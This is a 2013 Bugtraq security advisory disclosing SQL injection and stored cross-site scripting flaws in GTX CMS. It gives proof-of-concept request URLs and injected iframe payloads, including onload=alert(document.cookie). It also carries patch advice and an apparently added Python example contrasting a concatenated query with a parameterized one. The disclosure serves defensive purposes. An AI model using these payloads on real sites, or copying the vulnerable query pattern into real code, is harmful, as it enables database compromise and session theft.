List: bugtraq
Subject: GTX CMS 2013 Optima - Multiple Web Vulnerabilities
From: Vulnerability Lab <research () vulnerability-lab ! com>
Date: 2013-10-29 14:05:59
Message-ID: 526FC0C7.7010303 () vulnerability-lab ! com
Document Title:
===============
GTX CMS 2013 Optima - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1124
Release Date:
=============
2013-10-29
Vulnerability Laboratory ID (VL-ID):
====================================
1124
Common Vulnerability Scoring System:
====================================
7.2
Product & Service Introduction:
===============================
We provide you with the perfect community GTX CMS software solution - making it ready to meet your needs and requirements and tailored to your corporate design! The complete setup of your individual interactive community portal or your website is done by us, so you can get started right away!
GTX CMS is extremely flexible and can be operated as a closed community (e.g. parallel to your existing website) and as a normal website with a closed member area. For details, refer to the section `About GTX CMS`.
(Copy of the Vendor Homepage: http://www.gtx-cms.de/ )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered multiple web vulnerabilities in the official GTX Content Management System 2013 web application.
Vulnerability Disclosure Timeline:
==================================
2013-10-29: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
OBM-Media e.K.
Product: GTX CMS - Web Application Basic, Standard and Optima
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
Multiple remote SQL injection web vulnerabilities were detected in the official GTX Content Management System 2013 web application. The vulnerability allows remote attackers to inject their own SQL commands without authorization and compromise the web application or the web server's DBMS.
The SQL injection vulnerabilities are located in the vulnerable `objId` and `modId` values of the tagSearchTag module. Remote attackers are able to inject their own SQL commands via a GET method request to compromise the database management system or the CMS web application. The injection can be performed through the executable ajax path via a GET method request, or through the objId of the tagSearchTag module in a POST method request. The severity of the remote SQL injection bugs is estimated as high.
Exploitation of the remote SQL injection web vulnerability requires no user interaction and a low privileged web application user account. Successful exploitation of the remote SQL injection bug results in compromise of the database management system and of the CMS or web application.
Vulnerable Module(s):
[+] ajax
Vulnerable File(s):
[+] tagSearchTag
Vulnerable Parameter(s):
[+] objId
[+] modId
1.2
Multiple persistent input validation web vulnerabilities were detected in the official GTX Content Management System 2013 web application. The web vulnerability allows remote attackers to inject their own malicious script code via POST method into the online service on the application side.
The first persistent input validation web vulnerability is located in the ajax `tag-searchTag` module and the connected vulnerable q parameter. Remote attackers are able to inject their own malicious script code as a tag name. The execution occurs in the main communication module when a user or admin reviews the article or comments. Exploitation of the vulnerability requires a low privileged web application user account and only low user interaction (view, no click!).
The second persistent web vulnerability is located in the `linkverzeichnis` (link directory) add module. Remote attackers are able to inject their own malicious script code as `Schlüsselwörter` (keywords) in the search. The execution occurs in the main link directory module of the web application. Exploitation of the vulnerability requires a low privileged web application user account and low or medium user interaction (click!).
The third persistent web vulnerability is located in the `Ordnerverwaltung` (folder/path management) module. Remote attackers are able to manipulate the vulnerable `ordner` name value in the add POST method request. The execution occurs in the main path of the `persoenliche nachrichten` (private messages) module in the CMS control panel. Exploitation of the vulnerability requires a low privileged web application user account and medium user interaction (add+click!).
Successful exploitation of the remote vulnerabilities leads to persistent session hijacking (customers), account theft via persistent web attacks, persistent phishing, persistent redirects to external sources, persistent redirects as file downloads, or persistent manipulation of affected and connected context.
Vulnerable Module(s):
[+] ajax/tagSearchTag
[+] suche/linkverzeichnis
[+] pers-nachrichten/ordnerverwaltung
Vulnerable Input(s):
[+] Tags
[+] Suche - Linkverzeichnis > Schlüsselwörter - Suchbegriff(e) & Entfernung von
[+] Ordnerverwaltung - Add
Vulnerable Parameter(s):
[+] q
[+] keywords
[+] ordner
Proof of Concept (PoC):
=======================
1.1
The SQL injection web vulnerabilities can be exploited by remote attackers with a low privileged web application user account and without user interaction. For demonstration or to reproduce ...
PoC:
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd&objId=37_%20'null[SQL INJECTION VULNErABILITY!]--
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=[TAG(x)]&modId=ptd%20'null[SQL INJECTION VULNErABILITY!]--&objId=3
Exploit:
1.2
The persistent input validation web vulnerabilities can be exploited by remote attackers with a low privileged web application user account and low user interaction. For demonstration or to reproduce ...
1.2.1
PoC: Tags in Article or News
<div class="right">
<div id="tagTagsWidget">
<ul class="as-selections" id="as-selections-049"><li class="as-selection-item blur" id="as-selection-002"><a class="as-close">×</a>>"<iframe src="GTX-CMS.de%20%20Mitglieder-Communities%20f%C3%BCr%20Golfclubs,%20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20geeignet%20%C2%BB%20Linkverzeichnis%20%C2%BB%20Link%20hinzuf%C3%BCgen_files/a.htm"></iframe></li><li class="as-original" id="as-original-049"><input autocomplete="off" name="tags" id="as-input-049" class="text as-input" type="text"> <input value=">"<iframe src=a> >"<iframe src=a>>"<iframe src=a> >"<iframe src=a>>"<iframe src=a> >"<iframe src=a>>"<iframe src=a> >"<iframe src=a>>"<iframe src=a> >"<iframe src=a>,>" <iframe src=http://vuln-lab.com>," class="as-values" > name="as_values_049" id="as-values-049" type="hidden"></li></ul>
<div style="display: none;" class="as-results" id="as-results-049"></div>
</div>
Inject: Tags
http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen
PoC (PATH):
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E&modId=ptd&objId=null
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Da%3E%20%3E%22%3Ciframe%20src%3Da%3E%20&modId=ptd&objId=null
http://gtx-cms.localhost:8080/Ajax/tagSearchTag?q=%3E%22%3Ciframe%20src%3Dhttp%3Avuln-lab.com%3E&modId=ptd&objId=null
1.2.2
PoC: Suchbegriff(e) & Entfernung von
<div class="box">
<div class="formItems">
<div class="item row1">
<div class="left">
Schlüsselwörter</div><div class="right">>"<iframe src="GTX-CMS.de%20%20Mitglieder-Communities%20f%C3%BCr%20Golfclubs,%20Tennisclubs,%20Vereine,%20Verb%C3%A4nde%20etc.%20-%20auch%20als%20Intranet-CMS%20bestens%20geeignet%20%C2%BB%20Suche%20%C2%BB%20Linkverzeichnis%20%C2%BB%20Ergebnisse2_files/a.htm" onload="alert(document.cookie)" <="" div=""> </div>
</div>
</div>
Inject: Suchbegriff(e) & Entfernung von
http://gtx-cms.localhost:8080/linkverzeichnis/hinzufuegen
Output:
Suche - Linkverzeichnis > Schlüsselwörter
http://gtx-cms.localhost:8080/suche/linkverzeichnis
1.2.3
PoC: Ordnerverwaltung - Ordner Name
<li class="seperator"></li>
<!-- Users folders -->
<li><a class="icon" href="/pers-nachrichten/ordner/iframe-srchttpvuln-labcom-onloadalertdocumentcookie-iframe-srchttpvuln-labcom-onloadalertdocumentcookie-_1"> <img src="images/icons/Sophistique/files_24.png" alt="Ordner"> <span>>"<iframe src="http://vuln-lab.com" onload="alert(document.cookie)" <="" %20%20.">"<iframe src=http://vuln-lab.com onload=alert(document.cookie) < (0)</span> </a></li>
Inject: Ordnerverwaltung Add
http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung
Output: Persönliche Nachrichten
http://gtx-cms.localhost:8080/pers-nachrichten
http://gtx-cms.localhost:8080/pers-nachrichten/ordnerverwaltung
Solution - Fix & Patch:
=======================
1.1
The SQL injection web vulnerabilities can be patched by securely parsing and encoding the vulnerable `modId` and `objId` values in the tag search module.
1.2
The persistent input validation web vulnerabilities can be patched by securely parsing and encoding the vulnerable ordner name, q and keyword parameters.
Encode the output index of the ordner name in the private messages box and connected resources. Parse the tag search error output to prevent script code execution.
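As an added illustration of the fixes described under 1.1 and 1.2 (this is not code from the advisory or from GTX CMS, whose implementation language and schema are not public): a Python reconstruction of a tagSearchTag-style handler with the string-concatenated query beside its parameterized form, an objId check, and output encoding for a stored tag. The table, column names, the numeric-objId assumption and the helper names are constructed for this example.

```python
import html
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the CMS tag table; the real GTX CMS schema is not known.
DB = sqlite3.connect(":memory:")
DB.executescript("""
CREATE TABLE tags (mod_id TEXT, obj_id TEXT, tag TEXT);
INSERT INTO tags VALUES ('ptd', '37', 'golf'), ('ptd', '37', 'tennis'), ('ptd', '38', 'verein');
""")

# The advisory's 1.1 PoC request (q, modId and objId as in the advisory URL).
POC_URL = ("http://gtx-cms.localhost:8080/Ajax/tagSearchTag"
           "?q=[TAG(x)]&modId=ptd&objId=37_%20'null[SQL%20INJECTION%20VULNErABILITY!]--")

def request_params(url):
    """Decode the GET parameters the way a tagSearchTag handler would receive them."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}

def search_tags_vulnerable(mod_id, obj_id, q):
    """Hypothetical reconstruction of the flaw: request values concatenated into SQL text."""
    sql = (f"SELECT tag FROM tags WHERE mod_id = '{mod_id}' "
           f"AND obj_id = '{obj_id}' AND tag LIKE '%{q}%'")
    try:
        return [r[0] for r in DB.execute(sql)]
    except sqlite3.OperationalError as e:
        # The quote in the PoC objId closes the literal early: attacker text reached the SQL parser.
        return f"SQL ERROR: {e}"

def search_tags(mod_id, obj_id, q):
    """Hardened form: parameterized query, so the PoC objId is only ever compared as data."""
    rows = DB.execute(
        "SELECT tag FROM tags WHERE mod_id = ? AND obj_id = ? AND tag LIKE ?",
        (mod_id, obj_id, f"%{q}%"))
    return [r[0] for r in rows]

def validate_obj_id(value):
    """Defence in depth (assumption: objId is a numeric id, as in the PoC); reject anything else."""
    if not value.isdigit():
        raise ValueError(f"objId rejected: {value!r}")
    return int(value)

def render_tag(tag):
    """Output encoding for issue 1.2: a stored tag such as >"<iframe src=a> is shown as text."""
    return f'<li class="as-selection-item">{html.escape(tag, quote=True)}</li>'

if __name__ == "__main__":
    p = request_params(POC_URL)
    print(search_tags_vulnerable(p["modId"], p["objId"], p["q"]))  # starts with "SQL ERROR"
    print(search_tags(p["modId"], p["objId"], p["q"]))             # []
    print(render_tag('>"<iframe src=a>'))
```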
Security Risk:
==============
1.1
The security risk of the remote SQL injection web vulnerabilities is estimated as high(+).
1.2
The security risk of the persistent input validation web vulnerabilities is estimated as medium(+).
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material, contact admin@vulnerability-lab.com or research@vulnerability-lab.com to get permission.
Copyright © 2013 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com